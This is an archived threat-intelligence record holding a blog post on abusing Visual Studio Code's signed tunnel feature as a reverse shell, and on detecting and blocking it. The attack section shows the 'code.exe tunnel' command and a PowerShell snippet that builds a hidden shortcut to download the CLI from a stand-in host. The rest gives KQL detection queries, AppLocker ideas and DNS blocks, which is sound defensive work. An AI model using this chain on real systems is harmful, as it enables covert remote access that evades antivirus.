{
	"id": "e33a3e96-5ccd-487e-9fad-b294856c3016",
	"created_at": "2026-04-06T01:29:05.615695Z",
	"updated_at": "2026-04-10T03:20:40.766931Z",
	"deleted_at": null,
	"sha1_hash": "86e190b35f74507ae9a83054243455a0bae7f3cc",
	"title": "Visual Studio Code: embedded reverse shell and how to block, create Sentinel Detection, and add…",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 802105,
	"plain_text": "Visual Studio Code: embedded reverse shell and how to block,\r\ncreate Sentinel Detection, and add…\r\nBy Truvis Thornton\r\nPublished: 2024-09-09 · Archived: 2026-04-06 00:39:10 UTC\r\nVisual Studio Code: embedded reverse shell and how to block, create Sentinel\r\nDetection, and add Environment Prevention — well more like ideas and concepts\r\nto prevent abuse and exploit\r\n5 min read\r\nSep 25, 2023\r\nPress enter or click to view image in full size\r\nUPDATE: Looks like MS released GPO controls finally: https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/policies\r\nPS: I’ve also seen this attack being used by Red Teams and can confirm that it is possible to deploy 100% High\r\nFidelity detection for this type of attack regardless of SIEM. If you have not already, be sure to build this out and\r\nmake your team standout :) — If you dig deep enough, you can develop a blanket rule to catch any activity that's\r\nsimilar to this regardless of filename and application.\r\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\r\nPage 1 of 6\n\nOne of the worst fears as a cybersecurity expert is detecting and preventing a signed reverse shell binary. Guess\r\nwhat? Microsoft gladly gave us one. We can relate this back to when nmap had something like this before they\r\nremoved the feature. You could running CLI and execute commands from the binary. Fast forward, we still see\r\napplications providing this type of feature. This will not be the last time we see this.\r\nArticles of interest:\r\nhttps://code.visualstudio.com/docs/remote/tunnels\r\nhttps://code.visualstudio.com/blogs/2022/12/07/remote-even-better\r\nWhat makes this bad is the fact that this tunnel can be triggered from the command line with the portable version\r\nof code.exe. An attacker just has to upload the binary, which won’t be detected by any anti-virus since it is\r\nlegitimate and singed windows binary. If a VSCode is already installed, we can just stick to the installed version,\r\ndoesn’t matter.\r\nAttack\r\nIf we get code execution on the client we can always drop the portable version of VSCode, the code CLI. If a\r\nVSCode is already installed, we can just stick to the installed version, doesn’t matter. Just know that both options\r\nexist and it's normally installed by default these days.\r\nAs the binary is signed from Microsoft it will also bypass most restrictions and not set off any alarms.\r\nC:\\Users\\kitten\\Downloads\\vscode_cli_win32_x64_cli (1)\u003e.\\code.exe tunnel\r\n*\r\n* Visual Studio Code Server\r\n*\r\n* By using the software, you agree to\r\n* the Visual Studio Code Server License Terms (https://aka.ms/vscode-server-license) and\r\n* the Microsoft Privacy Statement (https://privacy.microsoft.com/en-US/privacystatement).\r\n*\r\nTo grant access to the server, please log into https://github.com/login/device and use code BD3D-134C\r\n✔ What would you like to call this machine? · desktop-kafcprf\r\n[2023-09-25 03:45:34] info Creating tunnel with the name: desktop-kafcprf\r\nOpen this link in your browser https://vscode.dev/tunnel/desktop-kafcprf/C:/Users/kitten/Downloads/vs\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\r\nPage 2 of 6\n\nNot one alert went off. Very sneaky and this is a very nice and clean remote shell.\r\nIf you wanted, you could build out an attack chain: (AI generated)\r\n$EXEPath = \"$env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\r\n$pay = 'cd C:\\tmp; iwr -uri https://somecleanhostedsite/vscode_cli_win32_x64_cli.zip -OutFile vscode\r\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\r\nPage 3 of 6\n\n$arguments = \" -nop -c $pay\"\r\n$LNKName = 123\r\n$obj = New-Object -ComObject WScript.Shell\r\n$link = $obj.CreateShortcut((Get-Location).Path + \"\\\" + $LNKName + \".lnk\")\r\n$link.WindowStyle = '7'\r\n$link.TargetPath = $EXEPath\r\n$link.IconLocation = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe,13\"\r\n$link.Arguments = $arguments\r\n$link.Save()\r\nBecause every environment and machine is different, your mileage may vary, especially as updates or changes\r\nhappen, so take these ideas and expand and use them as you see fit.\r\nRemember, logging also depends on auditing setting in your environment. Endpoint log sources offer the most\r\nvisibility.\r\nFile Creation\r\nFile write of code_tunnel.json which is param based but defaults to: %UserProfile%\\.vscode-cli\\code_tunnel.json\r\nlicense_consent.json file could also be watched when testing and playing in a vanilla instance.\r\nNot the most ideal solution as this requires endpoint logs which can be costly, especially file based ones.\r\nCommand Line\r\nGet Truvis Thornton’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nYou could use a KQL query like the following as a quick and dirty way to get started.\r\nSecurityEvent\r\n| where EventID == \"4688\"\r\n| where CommandLine contains \"code.exe\" and CommandLine contains \"tunnel\"\r\nDownside, is that code could be renamed and not actually be used. One option is to just look for the tunnel in the\r\nCLI. This could be the ideal way and then filter out FPs and not lose visibility.\r\nSecurityEvent\r\n| where EventID == \"4688\"\r\n| where CommandLine contains \"tunnel\"\r\nProcess Tree\r\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\r\nPage 4 of 6\n\nWe could look for process spawning from the original file or the file being dropped and then ran.\nProcess tree: code.exe -\u003e cmd.exe -\u003e .exe\nSecurityEvent\n| where EventID == \"4688\"\n| where ParentProcessName == \"code.exe\"\n| where NewProcessName contains \"cmd\" or NewProcessName contains \"powershell\"\nAnother option is you could also mix in looking for the file making or network connections with firewall or other\nend point based logs stemming from the file.\nPrevention\nAppLocker\nThis is a great application, but requires effort and work to maintain for many reasons.\nOne example may be to build a template to block by hash.\nDNS Blocking\nThis is probably the easiest to maintain and manage as it’s a central location and doesn’t require much\nreconfiguration especially if you have full control over DNS in your environment.\n*.tunnels.api.visualstudio.com\n*.devtunnels.ms\nGPO\nWhile this looks possible for visual studio there does not look to be a way to do this for vscode at this time\nConclusion\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\nPage 5 of 6\n\nHopefully this gives you some ideas on how to better protect and defend against this type of attack.\r\n—\r\n☕ Like what you read? Did it help you?\r\nSend some coffee and love https://buymeacoffee.com/truvis :)\r\nYour support helps pay for licenses, research \u0026 development, and other costs that allow me to bring you new\r\nguides and content!\r\n❗If you are new to my content, be sure to follow/connect with me on all my other socials for new ideas and\r\nsolutions to complicated real world problems and jump start your career! New content drops daily/weekly along\r\nwith tips and tricks :)\r\n👉 W: https://truv.is\r\n👉 T: https://twitter.com/thattechkitten\r\n👉 Y: https://www.youtube.com/@TRUValueInformationSecurity\r\n👉 G: https://github.com/truvis\r\n👉 L: https://www.linkedin.com/in/truvisthornton\r\n👉 M: https://medium.com/@truvis.thornton\r\nSource: https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add\r\n-e864ebafaf6d\r\nhttps://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d"
	],
	"report_names": [
		"visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d"
	],
	"threat_actors": [],
	"ts_created_at": 1775438945,
	"ts_updated_at": 1775791240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86e190b35f74507ae9a83054243455a0bae7f3cc.pdf",
		"text": "https://archive.orkl.eu/86e190b35f74507ae9a83054243455a0bae7f3cc.txt",
		"img": "https://archive.orkl.eu/86e190b35f74507ae9a83054243455a0bae7f3cc.jpg"
	}
}